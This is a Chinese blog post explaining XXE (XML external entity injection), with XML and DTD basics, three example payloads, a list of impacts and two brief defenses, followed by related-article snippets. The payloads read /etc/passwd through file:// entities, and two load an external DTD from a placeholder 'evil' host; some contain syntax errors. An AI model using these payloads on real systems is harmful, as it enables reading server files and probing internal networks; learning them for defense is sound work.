什么是XXE漏洞

最新推荐文章于 2023-12-14 14:18:59 发布
最新推荐文章于 2023-12-14 14:18:59 发布
阅读量3k 收藏 4
点赞数 1
分类专栏: WEB漏洞原理 文章标签: 网络安全 web漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ping_pig/article/details/99348464
版权

漏洞解释

XML外部实体注入(XML External Entity)简称XXE漏洞,XML用于标记电子文件使其具体结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括XML声明,DTD文档类型定义,文档元素.

常见的XML语法结构如下所示

<?xml version="1.0"?>XML声明
<!DOCTYPE note [
<!ELEMENT note(to,from,heading,body)>
<!ELEMENT to(#PCDATA)>
<!ELEMENT from(#PCDATA)>            文档定义类型(DATA)
<!ELEMENT heading(#PCDATA)>
<!ELEMENT body(#PCDATA)>
]>
<note>
<to>tove</to>
<from>jani</from>
<heading>reminder</heading>
<body>don't forget me this weekend</body>            文档元素
</note>

XML语法结构

其中.文档类型定义(DTD)可以是内部声明也可以引用外部DTD,如下所示

  1. 内部声明DTD格式:<!DOCTYPE 根元素 [元素声明]>
  2. 引用外部DTD格式:<!DOCTYPE 根元素 SYSTEM"文件名"> 

在DTD中进行实体声明时,将使用ENTITY关键词来声明,实体是用于定义引用普通文本或特殊字符的快捷方式的变量,实体可在内部或外部进行声明,如下所示

  1. 内部声明实体格式:<!ENTITY 实体名称 "实体的值">
  2. 引用外部实体格式:<!ENTITY 实体名称 SYSTEMT "URL">

漏洞利用方式

XXE漏洞也叫XXE实体注入,那么如果构建注入呢?

方式一:内部声明DTD格式

<?xml version="1.0"?>
<!DOCTYPE a [
    <! ENTITY b SYSTEM "file:///etc/passwd">
]>
<c>&b;</c>

方式二:引用外部DTD格式

<?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://test.com/evil.did">
<c>&b;</c>

//DTD文件内容如下所示
<!ENTITY b SYSTEM "file:///etc/passwd">

方式三:引用外部实体格式

<?xml version="1.0"?>
<!DOCTYPE a[
<!ENTITY % d SYSTEM "http://test.com/evil.did">
]>
<c>&b;</c>

//DTD文件内容如下所示
<!ENTITY b SYSTEM "file:///etc/passwd">

漏洞危害

  1. 远程命令执行
  2. 读取任意文件
  3. 探测内网端口
  4. 攻击内网网站

漏洞防御

  1. 使用开发语言提供的禁止外部实体的方法
  2. 过滤用户提交的XML数据

xxe漏洞的学习与利用总结

XXE(XML外部实体注入)漏洞

Ping_Pig
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE漏洞详解与利用
qq_56438857的博客
08-11 7314
XML(Extensible Markup Language)意为可扩展性标记语言,我将介绍下 XML 的一些基础知识,方便你更好地理解漏洞原理。
XXE漏洞安全-全网最详细讲解】
LCW991207的博客
08-04 4415
XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(external entity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6413
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE知识总结,有这篇就够了!
热门推荐
南迪叶先森
07-14 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! XXE基础 XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XML开始。 XML基础 XML 指可扩展标记语言(EXtensible Markup Lang.
XXE漏洞漏洞及利用方法解析
weixin_43749601的博客
03-02 2406
XXE(XML External Entity Injection)即XML外部实体类注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。 0x001 XML XML设计用来传送及携带数据信息,不用来表现或展示数据,HTML则用来表现数据,所以XML用途的焦点是它说明数据是什么,以
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML解
XXE详解
qq_48904485的博客
03-22 5479
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
(39.2)【XXE漏洞专题】XXE原理、产生、检测、危害、利用、示例
04-26 3635
【专题】XXE入门
XXE(xml外部实体攻击)
HoYim
04-11 4421
1、概念 XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
XXE漏洞详解(全网最详细)
qq_61553520的博客
05-09 3718
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入。
XXE漏洞详解
weixin_56714714的博客
07-25 7772
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
XXE(外部实体注入攻击)
sh0rk的博客
11-24 1万+
XXE什么是XXE利用方法进阶学习防御理论上的防御措施实践有效的防御措施 什么是XXE XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 利用方法 file:///C:/Windows/win.ini &lt;?xml versi...
XXE是什么?XXE漏洞原理及案例讲解(从0到1完全掌握XXE
最新发布
白帽黑客八哥的博客
12-14 4476
XXE(XML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击。XML文档可以定义实体,它们是存储文档中其他地方重复使用的数据的方式。外部实体是一种特殊类型的实体,它们的内容被定义在XML文档外部。XXE漏洞发生在当应用程序解析含有外部实体引用的XML文档时,没有正确地限制或禁止这些外部实体的使用。XXE是一种严重的安全漏洞,它的存在可能导致严重的安全风险。开发人员和安全专家必须了解此类漏洞的工作原理,确保在处理XML数据时采取适当的安全措施,以保护应用程序和数据的安全。
geoserver xxe漏洞
09-02
XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值